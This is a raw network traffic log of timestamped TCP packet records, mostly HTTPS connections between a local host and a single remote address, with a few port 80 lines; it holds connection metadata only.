Nov 13, 2024 18:44:11.123409986 CET	443	49769	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.256835938 CET	443	49769	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.257628918 CET	443	49769	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.258066893 CET	49769	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.258066893 CET	49769	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.258066893 CET	49769	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.260164022 CET	49772	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.260219097 CET	443	49772	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.260319948 CET	49772	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.260459900 CET	49772	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.260479927 CET	443	49772	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.303812981 CET	443	49766	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.303967953 CET	443	49766	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.304155111 CET	49766	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.304155111 CET	49766	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.304155111 CET	49766	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.305747032 CET	49773	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.305792093 CET	443	49773	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.305980921 CET	49773	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.305982113 CET	49773	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.306047916 CET	443	49773	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.354257107 CET	443	49768	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.354438066 CET	443	49768	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.354605913 CET	49768	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.355736971 CET	49768	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.355736971 CET	49768	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.355757952 CET	443	49768	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.355770111 CET	443	49768	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.356220961 CET	49774	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.356285095 CET	443	49774	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.356367111 CET	49774	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.356460094 CET	49774	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.356478930 CET	443	49774	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.415527105 CET	443	49770	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.415839911 CET	49770	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.415849924 CET	443	49770	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.416162014 CET	49770	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.416167021 CET	443	49770	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.481913090 CET	49769	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.481978893 CET	443	49769	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.545327902 CET	443	49770	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.545494080 CET	443	49770	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.545557976 CET	49770	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.545948982 CET	49770	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.545970917 CET	443	49770	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.545986891 CET	49770	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.545994043 CET	443	49770	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.548661947 CET	49775	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.548748970 CET	443	49775	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.548932076 CET	49775	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.549113989 CET	49775	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.549144030 CET	443	49775	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.606990099 CET	49766	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.607054949 CET	443	49766	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.618268013 CET	443	49771	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.618987083 CET	49771	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.619051933 CET	443	49771	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.619322062 CET	49771	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.619379044 CET	443	49771	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.751802921 CET	443	49771	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.751951933 CET	443	49771	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.752130032 CET	49771	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.752217054 CET	49771	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.752259970 CET	443	49771	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.752291918 CET	49771	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.752310038 CET	443	49771	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.755260944 CET	49776	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.755302906 CET	443	49776	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.755386114 CET	49776	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.755494118 CET	49776	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.755511045 CET	443	49776	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.101145983 CET	443	49774	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.101931095 CET	49774	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.101989985 CET	443	49774	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.102561951 CET	49774	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.102579117 CET	443	49774	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.198559999 CET	443	49772	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.199296951 CET	49772	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.199346066 CET	443	49772	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.199893951 CET	49772	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.199902058 CET	443	49772	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.233638048 CET	443	49774	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.233808994 CET	443	49774	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.234098911 CET	49774	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.234098911 CET	49774	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.234858990 CET	49774	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.234925985 CET	443	49774	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.236797094 CET	49777	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.236835003 CET	443	49777	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.236922026 CET	49777	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.237025976 CET	49777	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.237031937 CET	443	49777	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.277331114 CET	443	49773	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.278001070 CET	49773	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.278033972 CET	443	49773	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.278572083 CET	49773	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.278599977 CET	443	49773	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.300761938 CET	443	49775	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.301450014 CET	49775	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.301481009 CET	443	49775	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.301904917 CET	49775	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.301913977 CET	443	49775	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.375240088 CET	443	49772	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.375515938 CET	443	49772	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.375684023 CET	49772	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.375833988 CET	49772	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.375834942 CET	49772	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.375879049 CET	443	49772	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.375915051 CET	443	49772	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.378452063 CET	49778	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.378577948 CET	443	49778	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.378901005 CET	49778	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.378901005 CET	49778	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.379034042 CET	443	49778	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.415697098 CET	443	49773	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.415752888 CET	443	49773	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.415919065 CET	49773	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.415919065 CET	49773	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.415963888 CET	49773	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.415981054 CET	443	49773	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.418226957 CET	49779	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.418245077 CET	443	49779	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.418307066 CET	49779	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.418422937 CET	49779	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.418427944 CET	443	49779	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.435492039 CET	443	49775	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.435633898 CET	443	49775	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.435782909 CET	49775	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.435782909 CET	49775	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.435782909 CET	49775	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.437725067 CET	49780	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.437767029 CET	443	49780	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.437982082 CET	49780	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.437982082 CET	49780	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.438045025 CET	443	49780	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.690891981 CET	443	49776	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.691631079 CET	49776	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.691725016 CET	443	49776	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.692207098 CET	49776	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.692265034 CET	443	49776	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.747543097 CET	49775	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.747587919 CET	443	49775	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.820962906 CET	443	49776	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.821423054 CET	443	49776	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.821571112 CET	49776	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.821571112 CET	49776	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.821655989 CET	49776	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.821692944 CET	443	49776	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.824434042 CET	49781	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.824531078 CET	443	49781	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.824628115 CET	49781	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.824827909 CET	49781	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.824848890 CET	443	49781	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.969209909 CET	443	49777	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.969697952 CET	49777	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.969715118 CET	443	49777	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:12.970103025 CET	49777	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:12.970108032 CET	443	49777	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.097630978 CET	443	49777	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.098501921 CET	443	49777	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.098599911 CET	49777	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.098654032 CET	49777	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.098654032 CET	49777	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.098675966 CET	443	49777	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.098689079 CET	443	49777	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.101221085 CET	49782	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.101279020 CET	443	49782	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.101485968 CET	49782	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.101691008 CET	49782	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.101737022 CET	443	49782	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.108783007 CET	443	49778	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.109329939 CET	49778	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.109422922 CET	443	49778	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.109941006 CET	49778	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.109997988 CET	443	49778	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.162854910 CET	443	49779	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.180758953 CET	49779	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.180775881 CET	443	49779	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.181461096 CET	49779	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.181466103 CET	443	49779	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.242985010 CET	443	49778	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.243057013 CET	443	49778	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.243242025 CET	49778	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.243362904 CET	49778	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.243362904 CET	49778	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.243410110 CET	443	49778	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.243438959 CET	443	49778	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.247051001 CET	49783	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.247145891 CET	443	49783	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.247236967 CET	49783	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.247693062 CET	49783	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.247728109 CET	443	49783	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.306448936 CET	443	49779	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.307111979 CET	443	49779	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.307172060 CET	49779	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.307219028 CET	49779	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.307231903 CET	443	49779	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.307245016 CET	49779	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.307250977 CET	443	49779	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.310055971 CET	49784	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.310095072 CET	443	49784	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.310173035 CET	49784	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.310333014 CET	49784	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.310353041 CET	443	49784	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.416470051 CET	443	49780	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.417037010 CET	49780	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.417069912 CET	443	49780	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.417618036 CET	49780	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.417645931 CET	443	49780	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.547557116 CET	443	49780	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.547723055 CET	443	49780	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.547894001 CET	49780	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.547938108 CET	49780	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.547960043 CET	443	49780	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.547976017 CET	49780	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.547983885 CET	443	49780	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.551342010 CET	49785	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.551434994 CET	443	49785	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.551525116 CET	49785	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.551832914 CET	49785	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.551867008 CET	443	49785	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.614074945 CET	443	49781	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.614645004 CET	49781	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.614706993 CET	443	49781	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.615129948 CET	49781	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.615144968 CET	443	49781	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.750473976 CET	443	49781	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.750633001 CET	443	49781	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.750708103 CET	49781	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.750787973 CET	49781	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.750823975 CET	443	49781	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.750864983 CET	49781	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.750880957 CET	443	49781	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.753880024 CET	49786	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.753923893 CET	443	49786	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.753997087 CET	49786	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.754235029 CET	49786	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.754255056 CET	443	49786	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.850470066 CET	443	49782	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.858562946 CET	49782	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.858648062 CET	443	49782	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.859183073 CET	49782	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.859196901 CET	443	49782	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.970536947 CET	443	49783	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.971056938 CET	49783	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.971101999 CET	443	49783	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.971617937 CET	49783	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.971636057 CET	443	49783	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.987685919 CET	443	49782	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.987757921 CET	443	49782	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.987947941 CET	49782	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.988034964 CET	49782	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.988034964 CET	49782	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.988104105 CET	443	49782	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.988135099 CET	443	49782	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.991075039 CET	49787	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.991168022 CET	443	49787	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:13.991336107 CET	49787	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.991525888 CET	49787	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:13.991559982 CET	443	49787	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.101552010 CET	443	49783	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.101593971 CET	443	49783	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.101707935 CET	49783	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.101861000 CET	49783	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.101907969 CET	443	49783	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.101938009 CET	49783	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.101954937 CET	443	49783	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.104701042 CET	49788	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.104789972 CET	443	49788	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.105068922 CET	49788	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.105068922 CET	49788	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.105201960 CET	443	49788	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.113917112 CET	443	49784	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.114315033 CET	49784	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.114356995 CET	443	49784	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.114917994 CET	49784	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.114945889 CET	443	49784	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.248624086 CET	443	49784	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.248785973 CET	443	49784	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.249087095 CET	49784	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.249087095 CET	49784	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.249933958 CET	49784	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.249964952 CET	443	49784	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.251672029 CET	49789	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.251760006 CET	443	49789	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.251849890 CET	49789	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.251946926 CET	49789	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.251966953 CET	443	49789	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.288986921 CET	443	49785	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.289516926 CET	49785	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.289581060 CET	443	49785	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.289983034 CET	49785	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.289999962 CET	443	49785	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.341564894 CET	49724	80	192.168.2.4	199.232.214.172
Nov 13, 2024 18:44:14.347210884 CET	80	49724	199.232.214.172	192.168.2.4
Nov 13, 2024 18:44:14.347472906 CET	49724	80	192.168.2.4	199.232.214.172
Nov 13, 2024 18:44:14.416896105 CET	443	49785	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.417298079 CET	443	49785	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.417599916 CET	49785	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.417599916 CET	49785	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.417599916 CET	49785	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.419709921 CET	49790	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.419797897 CET	443	49790	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.419945955 CET	49790	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.420078039 CET	49790	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.420101881 CET	443	49790	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.580193996 CET	443	49786	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.581201077 CET	49786	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.581231117 CET	443	49786	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.581825018 CET	49786	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.581852913 CET	443	49786	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.720392942 CET	443	49787	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.720757008 CET	49787	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.720818996 CET	443	49787	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.721270084 CET	49787	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.721282959 CET	443	49787	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.731812954 CET	49785	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.731846094 CET	443	49785	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.737917900 CET	443	49786	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.738399029 CET	443	49786	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.738461018 CET	49786	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.738512993 CET	49786	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.738531113 CET	443	49786	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.738574982 CET	49786	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.738580942 CET	443	49786	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.741065979 CET	49791	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.741156101 CET	443	49791	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.741245031 CET	49791	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.741359949 CET	49791	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.741386890 CET	443	49791	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.839323044 CET	443	49788	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.839662075 CET	49788	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.839745998 CET	443	49788	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.840297937 CET	49788	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.840354919 CET	443	49788	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.849560976 CET	443	49787	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.849706888 CET	443	49787	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.849802971 CET	49787	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.849802971 CET	49787	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.849802971 CET	49787	443	192.168.2.4	13.107.246.45
